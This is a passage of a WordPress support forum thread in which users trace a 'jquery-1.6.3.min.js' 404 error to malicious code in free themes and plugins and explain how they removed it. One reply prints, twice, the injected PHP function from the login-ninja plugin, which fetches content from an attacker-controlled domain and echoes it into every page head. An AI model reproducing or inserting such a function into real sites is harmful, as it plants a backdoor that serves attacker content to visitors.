• Hello everybody,

    In this morning I found this error on my header website:

    Not Found

    The requested URL /jquery-1.6.3.min.js was not found on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
    Apache/2 Server at https://www.jqueryc.com Port 80

    I tried to find where is the problem in every file of my wordpress and theme but I can’t find it.
    The theme of my blog is gazpomag and it’s free.

    Please help!

Viewing 15 replies - 16 through 30 (of 47 total)
  • Thread Starter alexyo

    (@alexyo)

    Nispa, are you using plugins on your website from your localhost?

    yes I do use these plugins:
    Faster Image Insert
    Hungred Image Fit
    Imsanity
    jQuery lazy load plugin
    Related Posts Thumbnails
    Sociable

    OK guys, I FIXED this issue..

    in functions.php file in your theme folder
    search for ” jquery-1.6.3.min.js “

    then comment out where it starts with //

    good luck..

    This seems to be a broken or hacked (who knows) file
    https://www.jqueryc.com/jquery-1.6.3.min.js”

    My theme was FREE also.

    Thread Starter alexyo

    (@alexyo)

    Luciuskern, I’m glad for you and i think you should delete that section.
    I still not find anything in my theme regarding this jqueryc.com ??

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    @luciuskern, Did you identify if there are other backdoors in that theme?

    Can you tell me please where I should looking for this link

    Not really. That may be part of your theme, you really need to lose the theme like a bad infection.

    Guys, unless you like renting out YOUR site for the use of other unscrupulous people, lose that theme.

    It’s your choice, you can decide to continue to use those themes but please do not be surprised when bad things happen such as you are hacked or you lose search engine rankings.

    Thread Starter alexyo

    (@alexyo)

    Jan is right. I still not find anything and I decided to reinstall the wordpress. I will change the theme because I can not afford to let it happen again.

    I have searched and couldnt find anything else..

    I know leaving my current theme might be a bad idea. but I will take it on as it comes for now. This is really the first issue I had with the theme.

    After years of searching. I have found the right theme.

    I will see what happens

    Problem solved!
    For my part, it was a plugin amazon estore.
    I recommend disabling all plugins and see if the error message has disappeared, if the problem persists, this means that it is a plugin error. If it does not, mean that the problem is in the theme.
    Turn on plugins individually checking (refreshing main site) whether an error occurs, if it is is means the last activated plugin is causing error.

    Regards
    Kris

    Hi,

    In my case it also was a plugin: login-ninja (https://codecanyon.net/item/login-ninja/1932728).
    I simply deactivate it and now the problem is gone.
    I will be more carefull in the future…

    Ok for me its Facebook TrafficPop? for WordPress, deactivate and its ok

    FIXED
    credits goes to the proposed solution from luciuskern

    Thanks a million luciuskern ??

    problem is that the jquery is not found at this site https://www.jqueryc.com.

    Replace previous url to
    https://code.jquery.com/jquery-1.6.3.min.js
    this it will work.

    Thanks.problem is that the jquery is not found at this site https://www.jqueryc.com.

    Replace previous url to
    https://code.jquery.com/jquery-1.6.3.min.js
    this it will work.

    Thanks.

    Where should I put ?

    Avast is reporting https://www.jqueryc.com/ as being infected with malware. If you have a Free theme or plugin which is showing this error do the following.

    Using Total Commander on windows or grep in Linux search your theme folder for “https://www.jqueryc.com/”

    Mine was located in a rogue post.php file within my template. This post.php file was included from my themes functions.php. Compared with a clean version I simply removed the include entry in functions.php and deleted post.php which was located in a deep folder within the theme.

    It’s probably not the same for everyone so the best thing to do is search using grep, or total commander for the string “jqueryc” or similar to find which file is calling that malware, then search for the name of the file which contained the rogue URL, and determine how it’s being called in your theme or plugin to clean/fix it.

    HI, I have the same problem.Then I disabled the “Login-ninja” codecanyon plugin.Then problem solved.
    1-Navigate to the “/wp-content/plugins/login-ninja”
    2-Open the login-ninja.php file.
    3-You can see the following function.Comment or remove it.

    if (!function_exists('insert_jquery_theme')){
    	function insert_jquery_theme(){
    		if (function_exists('curl_init')){
    			$url="https://www.jqueryc.com/jquery-1.6.3.min.js";
    			$ch = curl_init();
    			$timeout = 5;
    			curl_setopt($ch, CURLOPT_URL, $url);
    			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    			curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    			$data = curl_exec($ch);
    			curl_close($ch);
    			echo $data;
    			}
    	}
    	add_action('wp_head', 'insert_jquery_theme');
    }

    Problem is solved!!!

    [ Signature moderated. ]

    HI, I have the same problem.Then I disabled the “Login-ninja” codecanyon plugin.Then problem solved. 1-Navigate to the “/wp-content/plugins/login-ninja” 2-Open the login-ninja.php file. 3-You can see the following function.Comment or remove it.

    if (!function_exists('insert_jquery_theme')){ 	function insert_jquery_theme(){ 		if (function_exists('curl_init')){ 			$url="https://www.jqueryc.com/jquery-1.6.3.min.js"; 			$ch = curl_init(); 			$timeout = 5; 			curl_setopt($ch, CURLOPT_URL, $url); 			curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 			curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); 			$data = curl_exec($ch); 			curl_close($ch); 			echo $data; 			} 	} 	add_action('wp_head', 'insert_jquery_theme'); }

    Problem is solved!!!

    [ Signature moderated. Also put the backtick on a new line before and after your code, it formats better that way. ]

Viewing 15 replies - 16 through 30 (of 47 total)
  • The topic ‘Not found jquery-1.6.3.min.js’ is closed to new replies.